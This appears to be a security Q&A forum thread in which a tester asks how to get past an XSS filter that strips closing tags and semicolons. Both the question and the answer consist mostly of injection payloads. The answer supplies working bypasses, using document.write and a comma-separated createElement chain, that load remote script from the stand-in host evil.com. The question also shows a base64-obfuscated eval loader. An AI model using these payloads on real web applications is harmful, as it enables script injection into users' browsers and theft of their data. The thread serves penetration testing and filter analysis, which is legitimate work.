I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.
The filters I have detected so far are as follows:
</anythingyouwant> gets replaced with nothing/> gets replaced with nothing; gets replaced with a space until the next ><img src="." onerror="alert('xss')">Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?
I have tried:
<img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))"> result: too long, even with a shortened URL<script src="//evil.com/myscript" /> result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag<script src=//evil.com/myscript"></script> result: gets filtered, destroys rest of page as above<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)"> result: semicolons get filtered, breaks web page<img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)"> result: im unsure if this is valid js, but it appears in the chrome view page source as intended, but does not work as wantedI am using chrome for testing, just in case it's relevant somehow.
The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:
<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">
or your version with a , instead of a ;:
<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">
But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.